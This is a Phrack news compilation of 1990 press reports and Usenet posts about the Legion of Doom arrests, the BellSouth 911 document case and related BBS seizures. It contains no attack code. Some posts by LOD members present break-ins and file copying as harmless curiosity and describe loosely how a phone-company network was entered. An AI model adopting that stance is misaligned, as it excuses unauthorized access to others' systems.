USA Today and the devil
-----------------------
Many controversies have been made of the article printed in USA Today
after Operation Sun-Devil took it's toll.
Phrack inc. tried to contact the author, and with no luck she wasn't
accepting phone calls. Please remember, this is only a USA Today article --
C'mon, get real USAT.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
byline 'Debbie Howlett, USA Today' reads:
A network of computer hackers operating in 14 cities -- which bilked phone
companies of $50 million -- has been unplugged, police say.
"We're not talking about somebody who played Space Invaders too many
times," says Tim Holtzen, spokesman for the U.S. attorney in Phoenix.
The hackers -- the largest such ring discovered in the USA --broke into
phone company and bank computer systems to obtain account numbers and run
up an unknown total in debts, police say.
"The main thing is the life-threatening information these computer hackers
were trying to get into," says Richard Adams of the Secret Service. "It
goes beyond being monetary to totally mischievous."
The ring was uncovered 18 months ago, when members tried and failed to
infiltrate computers at Barrows Neurological Institute in Phoenix.
They later tried to block incoming calls to the 911 emergency service in
Chicago. The motivation? "The primary reason is as kind of a malicious
hobby." says Gary Chapman of Computer Professionals for Social
Responsibility. "People are interested in testing their skills against
security measures." But, Adams says, "I hate to minimize it by saying it
was just for kicks."
Police seized 40 computers and 23,000 disks during searches Tuesday in 14
cities, officials said Wednesday. Five men, between the ages of 19 and 24,
have been arrested.
What's been uncovered so far, says Holtzen, may be "just the tip of the
iceberg."
[END OF STORY]
_______________________________________________________________________________
--------------------------------------------------------------------------------
==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #10 of 10
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN Phrack World News PWN
PWN Issue XXXI, Part Three PWN
PWN Compiled by Phreak_Accident PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Comp.dcom.telecom
-----------------
The following is excerpts from comp.dcom.telecom regard the now "Infamous"
Legion Of Doom busts. I know most of you have seen some of these
somewhere-sometime, but I thought I would try to get these out for those
unfortunate souls that don't have Usenet access.
I know there have been many controversies over the following material and
the busts as a whole -- Henceforth, Phrack Inc. will not comment on any of such
busts. Mainly because we don't want to jeopardize any current investigations
concerning LOD and others. Leave it alone. It's old news. Let this sum it up
for you guys and then forget about it.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Newsgroups: comp.dcom.telecom
Subject: CBS News Special Report - "The Busting of The Mentor"
Message-ID: <4747@accuvax.nwu.edu>
Date: 5 Mar 90 06:11:49 GMT
Sender: news@accuvax.nwu.edu
Organization: Capital Area Central Texas Unix Society, Austin, TX
Lines: 37
Approved: Telecom@eecs.nwu.edu
X-Submissions-To: telecom@eecs.nwu.edu
X-Administrivia-To: telecom-request@eecs.nwu.edu
X-Telecom-Digest: Volume 10, Issue 145, Message 6 of 6
...I've just gotten a new update on the Mentor's recent apprehension by
the Feds. Thought you might like to hear something as close to as direct
from the Mentor as possible under the circumstances.
From: Daneel Olivaw #96 @5283
Date: Sun Mar 04 19:55:28 1990
I'll have to play the Mentor for now (with permission granted).
If you haven't heard the rumors, here is the truth.
The Mentor was awakened at 6:30am on Thursday (3/1/90) with the gun of
a Secret Service agent pointed at his head. The SS proceded to search
and seize for the next 4 1/2 hours. Things taken include an AT with
80mb HD, HP LaserJet II, various documents, and other thing. They
then proceded to raid his office at work, and sieze the computer and
laser printer there. Lost in the shuffle was a complete novel (being
written and due in 2 weeks), and various other things.
Across town: Those of you who know Erik Bloodaxe, he was also
awakened, and his house searched.
Neither have been charged with anything, but they expect to at least
be called as witnesses at the case of the Phrack Boys (Knight
Lightning and Tarren King) in Chicago April 15.
Apparently, they did a shoddy job, as they tagged a book that Mentor
had borrowed from me (Quarterman's "The Matrix"), and then forgot to
take it, oh well....
It ain't lookin so lovely. Also the UT computer systes are under
*VERY* close watch, as they were/are being hacked on by hackers around
the world, including some in Australia, and England.
OM
From: cosell@bbn.com (Bernie Cosell)
Newsgroups: comp.dcom.telecom
Subject: Keeping Copies of Illegal Things (was Re: Jolnet, Again)
Message-ID: <4725@accuvax.nwu.edu>
Date: 4 Mar 90 04:36:50 GMT
Sender: news@accuvax.nwu.edu
Organization: TELECOM Digest
Lines: 52
Approved: Telecom@eecs.nwu.edu
X-Submissions-To: telecom@eecs.nwu.edu
X-Administrivia-To: telecom-request@eecs.nwu.edu
X-Telecom-Digest: Volume 10, Issue 143, Message 3 of 8
}TELECOM Digest Sat, 3 Mar 90 20:45:00 CST Special: Jolnet, Again
This isn't misc.legal, and this isn't the time to be excessively picky
and critical, but:
}Here is how he told the tale of the '911 software':
}The software showed up on his system one day, almost two years ago. It
}came to him from netsys, where Len Rose was the sysadmin. According to
}Andrews, when he saw this file, and realized what it was, he knew the
}thing to do was to 'get it to the proper authorities as soon as
}possible',...
}ME> "After you passed it along to Boykin, did you then destroy the
}file and get it off your site?"
}RA> "Well, no... I kept a copy also."
It strikes me that this is a KEY faux pas, regardless of good
intentions or not.
}But then, said Andrews, a funny thing happened several months later.
}The folks at AT&T, instead of being grateful for the return of their
}software came back to Andrews to (in his words) 'ask for it again.'
}Somehow, they either never got it the first time; got it but suspected
}there were still copies of it out; or were just plain confused.
Just so, and if RA *supplied* another copy, I suspect they'd interpret
that as pretty convincing evidence that it WAS further distributed,
and with RA's knowledge. I know that they didn't actually contact him
and ask/tell him to expunge all copies of the stuff, but his actions
clearly demonstrated his knowledge of just what it was he was messing
with, and I think they could easily show that he incurred an
obligation to act prudently with it, or else [just guessing now] he
could be liable to being an accessory after the fact.
}So he was contacted by the feds about a year ago, and it was at that
}point he decided it was in his best interest to cooperate with any
}investigation going on.
Perhaps his sudden cooperation was less out of pangs of conscience
that it might have appeared... [not to besmirch his motives here,
only to point out that a call from the FBI pointing out that while you
may not have really DONE anything, your actions _could_ end up landing
you in court with some serious potential badness going down (and none
of this untested cheesiness about the the technicalities of bbs's and
such... nice mainstream legal liability), could be pretty persuasive
at converting a concerned, but out-of-the-loop, citizen into an active
helper].
/Bernie\nFrom: dattier@chinet.chi.il.us (David Tamkin)
Newsgroups: comp.dcom.telecom
Subject: Seizures Spreading
Message-ID: <4724@accuvax.nwu.edu>
Date: 4 Mar 90 05:55:20 GMT
Sender: news@accuvax.nwu.edu
Organization: TELECOM Digest
Lines: 15
Approved: Telecom@eecs.nwu.edu
X-Submissions-To: telecom@eecs.nwu.edu
X-Administrivia-To: telecom-request@eecs.nwu.edu
X-Telecom-Digest: Volume 10, Issue 143, Message 2 of 8
News is that Illuminati BBS, a system run by a company named Steve
Jackson Games somewhere in Texas, was also shut down and its equipment
seized by the federal government because two suspected Legion of Doom
members were among its users.
[Moderator's Note: And I suspect the raids will continue during the
next week or two. I wonder which sites will be next? Each place they
raid, the local crackers point their fingers at each other like
naughty children, and to make themselves seem like the good guys they
say, "Have you talked to so-and-so yet?". Let's see now: netsys,
jolnet, attctc, illuminati, (your name here?)... Apparently even
getting rid of incriminating evidence won't work any longer, if
someone upstream of you tattled. PT]
From: mosley@peyote.cactus.org (Bob Mosley III)
Newsgroups: comp.dcom.telecom
Subject: Austin, TX BBS Shut Down From Joinet Bust Fallout
Message-ID: <4723@accuvax.nwu.edu>
Date: 4 Mar 90 17:22:26 GMT
Sender: news@accuvax.nwu.edu
Organization: Capital Area Central Texas Unix Society, Austin, TX
Lines: 28
Approved: Telecom@eecs.nwu.edu
X-Submissions-To: telecom@eecs.nwu.edu
X-Administrivia-To: telecom-request@eecs.nwu.edu
X-Telecom-Digest: Volume 10, Issue 143, Message 1 of 8
This hit most BBS's in the Austin area on Thursday. It's believed
the bust came down Wednesday morning. In a nutshell, here's what
happened:
Wednesday morning, Feb. 28, the offices of Steve Jackson Games, inc.,
were raided by FBI and Secret Service officials. The establishment was
shit down, and all computer systems, including the Illuminati BBS,
were confiscated.
At that time, a 'retired' member of the LoD, who was identified as
'The Mentor' was arrested. The charges reportedly are related to the
recent 911 bust that has shut down joinet and attatc (or whatever
Killerused to be called). His home system was confiscated, complete
with an entire collection of "Phrack" issues and related paraphanalia.
As of this writing, the Mentor is reportedly out on bail, sans system
and network connection. The Illuminati BBS is still down, although SJ
Games is back in operation, and no charges have been filed against any
of the employees other than The Mentor. The systems owned by SJ Games
have not been returned as of this writing.
Finally, rumors were trickling in early this morning (Saturday, 3/4)
that two BBS's in Dallas, three in Houston, and one in San Antonio
were busted by the same authorites in relation to the same case.
[in light of the Mentor's posted defense of the LoD, I kinda thought
you'd like to see this one! - OM]
From: telecom@eecs.nwu.edu (TELECOM Moderator)
Newsgroups: comp.dcom.telecom
Subject: Jolnet, Again
Message-ID: <4701@accuvax.nwu.edu>
Date: 4 Mar 90 02:45:00 GMT
Sender: news@accuvax.nwu.edu
Organization: TELECOM Digest
Lines: 350
Approved: Telecom@eecs.nwu.edu
X-Submissions-To: telecom@eecs.nwu.edu
X-Administrivia-To: telecom-request@eecs.nwu.edu
X-Telecom-Digest: Special: Jolnet, Again
TELECOM Digest Sat, 3 Mar 90 20:45:00 CST Special: Jolnet, Again
Today's Topics: Moderator: Patrick Townson
Re: AT&T Sourcecode: Poison! (Chip Rosenthal)
Jolnet Seizure (Mike Riddle)
Article Regarding JOLNET/e911/LoD/Phrack (Ben Rooney)
A Conversation With Rich Andrews (TELECOM Moderator)
Killer/attctc Permanently Down (Charlie Boykin)
----------------------------------------------------------------------
From: Chip Rosenthal <chip@chinacat.lonestar.org>
Subject: Re: AT&T Sourcecode: Poison!
Date: 3 Mar 90 00:00:00 GMT
Organization: Unicom Systems Development, Austin (yay!)
[Moderator's Note: Original date of 2/25 changed to prevent premature
expiration. PT]
You've got a lot of nerve, Patrick.
telecom@eecs.nwu.edu (TELECOM Moderator) writes:
>We're told by a deep-throat type that AT&T is on the war path about
>their software [...] Like jolnet, netsys went down abruptly, with
>*everything* confiscated [...] Now comes news that attcdc [sic], formerly
>known as killer went off line in a hurry.....
Yessir, after all your complaints about that about anonymous Legion of
Doom message, this is a really crummy thing to post. Based upon
unattributed conversations, you imply that Len Rose and Charlie Boykin
were involved in wrongdoing which lead to the shutdown of their
systems.
I don't know Len personally, but have had uucp connections with him in
the past. Charlie, on the other hand, I do know personally. He is
very well regarded in the Dallas/Fort Worth area, and was voted "1989
DFW Administrator of the Year" by the DFW lunch-bunch...errr....DFW
Association of Unix System Administrators.
You have cast some crummy aspersions towards these guys. Since I know
them, I will wait for the facts to come in. Others who don't know
them could very well jump to conclusions on the basis of this posting.
Was this message really called for?
Chip Rosenthal | Yes, you're a happy man and you're
chip@chinacat.Lonestar.ORG | a lucky man, but are you a smart
Unicom Systems Development, 512-482-8260 | man? -David Bromberg
------------------------------
Date: Wed, 28 Feb 90 21:38:39 EST
From: Mike Riddle <Mike.Riddle@p6.f666.n5010.z1.fidonet.org>
Subject: Jolnet Seizure
Reply-to: Mike.Riddle@p6.f666.n285.z1.fidonet.org
Organization: DRBBS Technical BBS, Omaha, Ne. 402-896-3537
Has anyone tried a novel legal approach to the case of equipment
seizure as "evidence"? As I remember the Electronic Communications
Privacy Act, it contains specific procedures for authorities to obtain
copies/listings of data on a system (which system may have been used
for illegal purposes, but whose operator is not at the moment
charged). From this I think a creative attorney could construct an
argument that the national policy was not to seize equipment, merely
to obtain all the information contained therein. After all, it's the
data that caused any harm.
Also, the Federal Rules of Evidence, and most state rules, provide
that computer generated copies are "originals" for evidentiary
purposes.
I hope that someone close enough to the scene can keep us informed
about what is happening on this one.
{standard disclaimer goes here--don't pay any attention to me!}
--- Ybbat (DRBBS) 8.9 v. 3.07 r.1
* Origin: [1:285/666.6@fidonet] The Inns of Court, Papillion, NE (285/666.6)
--- Through FidoNet gateway node 1:16/390
Mike.Riddle@p6.f666.n5010.z1.fidonet.org
------------------------------
From: brooney@sirius.uvic.ca
Date: 3 Mar 90 2:36 -0800
Subject: Article Regarding JOLNET/e911/LoD/Phrack
The following is an article I received five days ago which contains, to my
knowledge, information as yet unpublished in comp.dcom.telecom regarding the
ongoing JOLNET/e911/LoD discussion. It was printed in a weekly magazine
with a publishing date of Feb. 27 but other than that I have no exact idea
of when the events mentioned herein took place.
- Ben Rooney
MISSOURI STUDENT PLEADS INNOCENT TO 911 CHARGES
[Knight Lightning], a 19-year-old University of Missouri student, has
pleaded not guilty to federal allegations that he invaded the 911
emergency phone network for 9 states.
As reported earlier, he was indicted this month along with [The Prophet],
20, of Decatur, Ga. Both are charged with interstate
transportation of stolen property, wire fraud, and violations of the
federal Computer Fraud and Abuse Act of 1986.
Prosecutors contend the two used computers to enter the 911 system of
Atlanta's Bell South, then copied the program that controls and
maintains the system. The stolen material later allegedly was
published on a computer bulletin board system operating in the Chicago
suburb of Lockport. Authorities contend Neidorf edited the data for
an electronic publication known as "Phrack."
According to Associated Press writer Sarah Nordgren, in a recent
hearing on the case Assistant U.S. Attorney William Cook was granted a
motion to prevent the 911 program from becoming part of the public
record during the trial. U.S. District Judge Nicholas Bua set April
16 for a trial.
The 911 system in question controls emergency calls to police, fire,
ambulance and emergency services in cities in Alabama, Mississippi,
Georgia, Tennessee, Kentucky, Louisiana, North Carolina, South
Carolina and Florida.
---------------------------------------
Article from "A Networker's Journal" by Charles Bowen.
Info-Mat Magazine (Vol. 6, No. 2)
[Moderator's Note: {Info-Mat Magazine}, by the way, is the excellent
electronic journal distributed on many BBS machines throughout the
United States who are fortunate enough to be accepted as part of the
magazine's distribution network. I personally wish it was distributed
on Usenet as well: it is well written and very informative. PT]
------------------------------
Date: Sat, 3 Mar 90 19:34:54 CST
From: TELECOM Moderator <telecom@eecs.nwu.edu>
Subject: A Conversation With Rich Andrews
After the first articles appeared here relating to the seizure of
Jolnet, and the indictment of some people for their part in the theft
of '911 software', I got various messages from other folks in
response. Some were published, while others were just personal
correspondence to me. One from Chip Rosenthal was held over, and is
included in this special issue today.
One writer, whose comments were attributed to 'Deep Throat' spent some
time on two occassions on the phone, in a conference call between
himself, David Tamkin and myself.
What was lacking in the several messages which appeared over the past
week were comments from Rich Andrews, system administrator of Jolnet.
I got one note from someone in Canada who said Andrews wanted to speak
with me, and giving a phone number where I could call Andrews at his
place of employment.
I put in a call there, with David Tamkin on the other line and had a
long discussion with Andrews, who was aware of David being on the line
with me. I asked Andrews if he had any sort of net access available
to him at all -- even a terminal and modem, plus an account on some
site which could forward his mail to telecom. You see, I thought, and
still think it is extremely important to include Rich Andrews in any
discussion here.
He assured me he did have an account on a Chicago area machine, and
that a reply would be forthcoming within hours. I had a second
conversation with him the next morning, but without David on the line.
He again told me he would have a response to the several articles
written in the Digest ready and in the email 'very soon'. This was on
Wednesday morning, and we estimated his message would be here sometime
later in the day -- certainly by midnight or so, when I am typically
working up an issue of the Digest.
Midnight came and went with no message. None showed up Thursday or
Friday. I deliberatly withheld saying anything further in the hopes
his reply would be here to include at the same time. I guess at this
point we have to go on without him.
When David Tamkin and I talked to him the first time, on Tuesday
evening this past week, the first thing Andrews said to us, after the
usual opening greetings and chitchat was,
"I've been cooperating with them for over a year now. I assume you
know that."
We asked him to define 'them'. His response was that 'them' was the
United States Secret Service, and the Federal Bureau of Investigation.
He said this without us even asking him if he was doing so.
We asked him to tell us about the raid on his home early in February.
He said the agents showed up that Saturday afternoon with a warrant,
and took everything away as 'evidence' to be used in a criminal
prosecution.
ME> "If you have been working and cooperating with them for this long,
why did they take your stuff?"
RA> "They wanted to be sure it would be safe, and that nothing would be
destroyed."
ME> "But if you wanted to simply keep files safe, you could have taken
Jolnet off line for a few weeks/months by unplugging the modems from
the phone jacks, no? Then, plugged in a line when you wanted to call
or have a trusted person call you."
RA> "They thought it was better to take it all with them. It was mostly
for appearance sake. They are not charging me with anything."
ME> "Seems like a funny way to treat a cooperative citizen, at least
one who is not in some deep mess himself."
He admitted to us that several crackers had accounts on Jolnet, with
his knowledge and consent, and that it was all part of the investigation
going on ... the investigation he was cooperating in.
Here is how he told the tale of the '911 software':
The software showed up on his system one day, almost two years ago. It
came to him from netsys, where Len Rose was the sysadmin. According to
Andrews, when he saw this file, and realized what it was, he knew the
thing to do was to 'get it to the proper authorities as soon as
possible', so he chose to do that by transferring it to the machine
then known as killer, a/k/a attctc, where Charlie Boykin was the
sysadmin.
Andrews said he sent it to Boykin with a request that Boykin pass it
along to the proper people at AT&T.
ME> "After you passed it along to Boykin, did you then destroy the
file and get it off your site?"
RA> "Well, no... I kept a copy also."
ME> "Did Charlie Boykin pass it along to AT&T as you had requested?"
RA> "I assume he did."
But then, said Andrews, a funny thing happened several months later.
The folks at AT&T, instead of being grateful for the return of their
software came back to Andrews to (in his words) 'ask for it again.'
Somehow, they either never got it the first time; got it but suspected
there were still copies of it out; or were just plain confused.
So he was contacted by the feds about a year ago, and it was at that
point he decided it was in his best interest to cooperate with any
investigation going on.
Andrews pointed out that the '911 software' was really just ".... a
small part of what this is all about..." He said there was other
proprietary information going around that should not be circulating.
He said also the feds were particularly concerned by the large number
of break-ins on computers which had occurred in the past year or so.
He said there have been literally "....thousands of attempts to break
into sites in the past year....", and part of his cooperation with the
authorities at this time dealt with information on that part of it.
We asked him about killer/attctc:
ME> "You knew of course that killer went off line very abruptly about
a week ago. What caused that? It happened a week or so after the feds
raided you that Saturday."
RA> "Well the official reason given by AT&T was lack of funds, but you
know how that goes...."
Now you'd think, wouldn't you, that if it was a funding problem -- if
you can imagine AT&T not having the loose change in its corporate
pocket it took to provide electrical power and phone lines to attctc
(Charlie got no salary for running it) -- that at least an orderly
transition would have taken place; i.e. an announcement to the net; an
opportunity to distribute new maps for mail and news distribution,
etc; and some forthcoming shut down date -- let's say March 1, or
April 1, or the end of the fiscal year, or something....
But oh, no... crash boom, one day it is up, the next day it is gone.
ME> "What do you know about the temporary suspension of killer some
time ago? What was that all about?"
RA> "It was a security thing. AT&T Security was investigating Charlie
and some of the users then."
Andrews referred to the previous shutdown of killer as 'a real blunder
by AT&T', but it is unclear to me why he feels that way.
We concluded our conversation by Andrews noting that "there is a lot
happening out there right now."
He said the [Phrack] magazine distribution, via netsys, attctc and
jolnet was under close review. "One way to get them (crackers) is by
shutting down the sites they use to distribute stuff..."
And now, dear reader, you know everything I know on the subject. Well,
almost everything, anyway....
From other sources we know that Len Rose of netsys was in deep
trouble with the law *before* this latest scandal. How deep? Like he
was ready to leave the country and go to the other side of the world
maybe? Like he was in his car driving on the expressway when they
pulled him over, stopped the car and placed him under arrest? Deep
enough? This latest thing simply compounded his legal problems.
Patrick Townson
------------------------------
Date: Fri Mar 2 06:59:23 1990
From: Charlie Boykin <cfb@sulaco.sigma.com>
Subject: Killer/attctc Is Permanently Down
Hello,
Regarding a couple of things as well as a message from Bill Huttig.
The system WAS shut down a couple of years ago - for three weeks -
as part of a security inquiry. It has been in continous operation
since. On July 4, 1989, it was moved to a Customer Demonstration
location at the Dallas Infomart and the node name changed to attctc
(for AT&T Customer Technology Center). The system was closed down on
February 20, 1990 after 5 years of operation. There are no charges
pending and the "management" of the system have been ostensibly
cleared of any illegal activities.
As of now, there are no intentions of returning the system to
service. There are hopeful plans and proposals that could conceivably
result in the system being placed back in service in a different
environment and under different management.
Respectfully,
Charles F. Boykin
Formerly sysop@attctc (killer)
------------------------------
End of TELECOM Digest Special: Jolnet, Again
******************************
---------------
[reprinted without permission from the Feb. 12th, 1990 issue of Telephony]
ALLEGED HACKERS CHARGED WITH THEFT OF 911 DATA
Dawn Bushaus, Assistant Editor
Four alleged computer hackers were indicted last week on charges that they
schemed to steal and publish proprietary BellSouth Corp. emergency data. The
alleged activity could have produced disruptions in 911 networks nationwide,
according to federal officials.
The case could raise new concerns about the security of local exchange
carriers' internal computer networks, which house data records on customers,
equipment and operations.
"Security has always been a concern for the telephone companies," said
Peter Bernstein, an analyst with Probe Research. "If you can crack the 911
system, what does that say about the operational support system or the billing
system?"
A federal grand jury in Chicago handed down two indictments charging
[The Prophet], 20, of Decatur, Ga., and [Knight Lightning], 19, of
Chesterfield, Mo., with wire fraud, violations of the 1986 Computer Fraud Act
and interstate transportation of stolen property.
Facing similar criminal charges in Atlanta are [The Urvile], 22, and
[The Leftist], 23.
The four, alleged to be part of a closely knit group of hackers calling
themselves the Legion of Doom, reportedly participated in a scheme to steal the
BellSouth 911 data, valued at $80,000, and publish it in a hacker magazine
known as "Phrack."
The Legion of Doom reportedly is known for entering telephone companies'
central office switches to reroute calls, stealing computer data and giving
information about accessing computers to fellow hackers.
According to the Chicago indictment, XXXXX, also known as "The Prophet,"
stole a copy of the BellSouth 911 program by using a computer outside the
company to tap into the BellSouth computer. Riggs then allegedly transferred
the data to a computer bulletin board in Lockport, Ill.
XXXXXXX, also known as "Knight Lightning," reportedly downloaded the
information into his computer at the University of Missouri, Columbia, where he
edited it for publication in the hacker magazine, the indictment said.
The indictment also charges that the hackers disclosed the stolen
information about the operation of the enhanced 911 system to other hackers so
that they could illegally access the system and potentially disrupt or halt
other systems across the country.
The indictments followed a year-long investigation, according to U.S.
Attorney Ira Raphaelson. If convicted, the alleged hackers face 31 to 32 years
in prison and $122,000 in fines.
A BellSouth spokesman said the company's security system discovered the
intrusion, which occurred about a year ago, and the company then notified
federal authorities.
Hacker invasion in the BellSouth network is very rare, the spokesman said,
adding that the company favors "stringent laws on the matter."
The indictment solicited concern about the vulnerability of the public
network to computer hacking.
----------------
From: MM02885@swtexas.bitnet
Newsgroups: comp.dcom.telecom
Subject: Re: Hacker Group Accused of Scheme Against BellSouth
Message-ID: <4153@accuvax.nwu.edu>
Date: 20 Feb 90 11:16:00 GMT
Sender: news@accuvax.nwu.edu
Organization: TELECOM Digest
Lines: 95
Approved: Telecom@eecs.nwu.edu
X-Submissions-To: telecom@eecs.nwu.edu
X-Administrivia-To: telecom-request@eecs.nwu.edu
X-Telecom-Digest: Volume 10, Issue 118, message 3 of 6
<<< SYS$ANCILLARY:[NOTES$LIBRARY]GENERAL.NOTE;1 >>>
-< General Discussion >-
==============================================================================
Note 155.6 the MENTOR of the tree tops 6 of 6
SWT::RR02026 "Ray Renteria [ F L A T L I N E ] " 89 lines 20-FEB-1990 00:18
-< Life, The Universe, & LOD >-
To set the record straight, a member of LOD who is a student in Austin
and who has had his computer account at UT subpoenaed by the DA out of
Chicago because of dealings with the above happenings:
My name is Chris, but to the computer world, I am Erik Bloodaxe. I
have been a member of the group known as Legion of Doom since its
creation, and admittedly I have not been the most legitimate computer
user around, but when people start hinting at my supposed
Communist-backed actions, and say that I am involved in a world-wide
consipracy to destroy the nations computer and/or 911 network, I have
to speak up and hope that people will take what I have to say
seriously.
Frank, Rob and Adam were all definately into really hairy systems.
They had basically total control of a packet-switched network owned by
Southern Bell (SBDN)...through this network they had access to every
computer Southern Bell owned...this ranging from COSMOS terminals up
to LMOS front ends. Southern Bell had not been smart enough to
disallow connections from one public pad to another, thus allowing
anyone who desired to do so, the ability to connect to, and seize
information from anyone else who was using the network...thus they
ended up with accounts and passwords to a great deal of systems.
This was where the 911 system came into play. I don't know if this
system actually controlled the whole Southern Bell 911 network, or if
it was just a site where the software was being developed, as I was
never on it. In any case, one of the trio ended up pulling files off
of it for them to look at. This is usually standard proceedure: you
get on a system, look around for interesting text, buffer it, and
maybe print it out for posterity. No member of LOD has ever (to my
knowledge) broken into another system and used any information gained
from it for personal gain of any kind...with the exception of maybe a
big boost in his reputation around the underground. Rob took the
documentation to the system and wrote a file about it. There are
actually two files, one is an overview, the other is a glossary. (Ray
has the issue of PHRACK that has the files) The information is hardly
something anyone could possibly gain anything from except knowledge
about how a certain aspect of the telephone company works.
The Legion of Doom used to publish an electronic magazine called the
LOD Technical Journal. This publication was kind of abandoned due to
laziness on our part. PHRACK was another publication of this sort,
sent to several hundred people over the Internet, and distributed
widely on bulletin boards around the US. Rob sent the files to PHRACK
for the information to be read. One of PHRACK's editors, Craig,
happened to be the one who received the files. If Rob had sent the
files to one address higher, Randy would have been the one who would
probably be in trouble. In anycase, Craig, although he may have
suspected, really had no way to know that the files were propriatary
information and were stolen from a Southern Bell computer.
The three Atlanta people were busted after having voice and data taps
on their lines for 6 months. The Phrack people were not busted, only
questioned, and Craig was indicted later.
What I don't understand is why Rob and Craig are singled out more
often than any other people. Both of them were on probation for other
incidents and will probably end up in jail due to probation violations
now. Frank and Adam still don't know what is going on with their
cases, as of the last time I spoke with them.
The whole bust stemmed from another person being raided and rolling
over on the biggest names he could think of to lighten his burden.
Since that time, Mr. William Cook, the DA in Chicago, has made it his
life's goal to rid the world of the scourge of LOD. The three Atlanta
busts, two more LOD busts in New York, and now, my Subpoena.
People just can't seem to grasp the fact that a group of 20 year old
kids just might know a little more than they do, and rather than make
good use of us, they would rather just lock us away and keep on
letting things pass by them. I've said this before, you cant stop
burglars from robbing you when you leave the doors unlocked and merely
bash them in the head with baseball bats when they walk in. You need
to lock the door. But when you leave the doors open, but lock up the
people who can close them for you another burglar will just walk right
in.
If anyone really wants to know anything about what is going on or just
wants to offer any opinions about all this directly to me, I'm
erikb@walt.cc.utexas.edu
but my account is being monitored so don't ask anything too explicit.
->ME
-----------
Well, as some of you may already know, the people that put out Phrack were
busted recently. Up until now, details were scarce, but things are starting to
appear in the news.
[reprinted without permission from the Milwaukee Journal Wed. Feb. 7th]
Chicago, Ill. - AP - A computer hacker broke into the 911 emergency
telephone network covering nine states in the South and another intruder passed
on the access data to other hackers, authorities said.
[The Prophet], 20, of Decatur, GA., and [Knight Lightning],
19, of Chesterfield, MO., were indicted Tuesday by
a federal grand jury and accused of computer crimes, said acting US Atty. Ira
H. Raphaelson.
He said Riggs was a member of the so-called Legion of Doom hackers
group, whose members are involved in numerous illegal activities.
Riggs and two other alleged members also were indicted in Atlanta and
charged in other computer break-ins.
The government would not say if any emergency calls were disrupted or
whether other damage was done during the tampering.
------------
Name: The Prophet #104
Date: Tue Feb 06 23:55:15 1990
Imagine that you're deaf, dumb, blind, and paralyzed from the neck down and
totally unable to experience or communicate with the outside world. How long
could you retain your sanity? How many of you would choose to die instead?
How many of you think you could muster the willpower to create your own little
mental world to live in for the rest of your life, and how long do you think
the hospital would wait before putting you out of your misery?
-The Prophet
------------
Name: The Mentor #1
Date: Sat Jan 20 02:58:54 1990
Welp, Phrack magazine is dead. Those of you who pay attention to BITNET know
that the phrack accounts at U of M have been shut down. The story is as
follows...
Government agents (not sure of the dept., probably SS) have apparently been
monitoring the e-mail of the Phrack kids (Knight Lightning & Taran King) for
some time now. Apparently, a portion of a file sent to them (and subsequently
published) contained copyrighted information. This is all they needed. They
have now seized the entire Phrack net mailing list (over 500 accounts), plust
every piece of information that Randy & Craig have (and they have a *LOT*) on
real names, addresses and phone numbers.
This is evolving directly out of the busts of three LOD members (Urvile,
Leftist & Prophet). The Prophet (who is on probation) is apparently being
threatened with a prison term if he doesn't cooperate. We don't know for sure
if he cooperated or not, but what would you do in the same position?
The same officials are apparently *VERY* interested in our co-sys, Mr.
Bloodaxe. His net account is being watched, etc. I'll let him tell the story.
board only. I will be adding a secure (and I mean fucking secure) encryption
routine into the e-mail in the next 2 weeks - I haven't decided exactly how to
implement it, but it'll let two people exchange mail encrypted by a password
only know to the two of them. Hmmmm... carry this conversation to the
programming board.
Anyway, I do not think I am due to be busted, but then again, I don't do
anything but run a board. Still, there is that possibility. I assume that my
lines are all tapped until proven otherwise.
There is some question to the wisdom of leaving the board up at all, but I hae
(have) personally phoned several government investigators and invited them to
join us here on the board. If I begin to feel that the board is putting me in
any kind of danger, I'll pull it down with no notice - I hope everyone
understands.
It looks like it's sweeps-time again for the feds. Let's hope all of us are
still around in 6 months to talk about it.
The Mentor
Legion of Doom!
[Phoenix Project has been down for some time now.]
---------------
Newsgroups: comp.dcom.telecom
Subject: The Purpose and Intent of the Legion of Doom
Message-ID: <4248@accuvax.nwu.edu>
From: anytown!legion@cs.utexas.edu (Legion of Doom)
Date: 22 Feb 90 04:42:04 GMT
Sender: news@accuvax.nwu.edu
Organization: Anytown USA
Approved: Telecom@eecs.nwu.edu
X-Submissions-To: telecom@eecs.nwu.edu
X-Administrivia-To: telecom-request@eecs.nwu.edu
X-Telecom-Digest: Volume 10, Issue 121, message 4 of 5
Lines: 51
[Moderator's Note: This anonymous message came in the mail today. PT]
Well, I had to speak up. There has been a lot of frothing (mostly by
people who believe everything that they read in the paper) about
Legion of Doom. I have been involved in the group since 1987, and
dislike seeing irresponsible press concerning our "plot to crash 911"
or our "links to organized crime."
LOD was formed to bring together the best minds from the computer
underground - not to do any damage or for personal profit, but to
share experiences and discuss computing. The group has *always*
maintained the highest ethical standards of hacker (or "cracker," as
you prefer) ethics. On many occasions, we have acted to prevent abuse
of systems that were *dangerous* to be out - from government systems
to Easter Seals systems. I have known the people involved in this 911
case for many years, and there was *absolutely* no intent to interfere
with or molest the 911 system in any manner. While we have
occasionally entered a computer that we weren't supposed to be in, it
is grounds for expulsion from the group and social ostracism to do any
damage to a system or to attempt to commit fraud for personal profit.
The biggest crime that has been committed is that of curiosity. Kim,
your 911 system is safe (from us, at least). We have been instrumental
in closing many security holes in the past, and had hoped to continue
to do so in the future. The list of computer security people who count
us as allies is long, but must remain anonymous. If any of them choose
to identify themselves, we would appreciate the support.
I am among the people who no longer count themselves as "active"
members of the group. I have been "retired" for well over a year. But
I continue to talk to active members daily, and support the group
through this network feed, which is mail-routed to other LODers, both
active and accessible.
Anyone who has any questions is welcome to mail us - you'll find us
friendly, although a bit wary. We will also be glad to talk voice with
anyone if they wish to arrange a time to call. In spite of all the
media garbage, we consider ourselves an ethical, positive force in
computing and computer security. We hope others will as well.
The Mentor/Legion of Doom
legion%anytown.uucp@cs.utexas.edu
[Moderator's Note: As an 'ethical, positive force in computing', why
can't you sign your name to messages such as the above? Usually I
don't even consider anonymous messages for publication in the Digest;
but your organization has a perfect right to tell your side of the
story, and I am derelict if I don't print it. Real names and
addresses go a long way toward closing credibility gaps here. PT]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
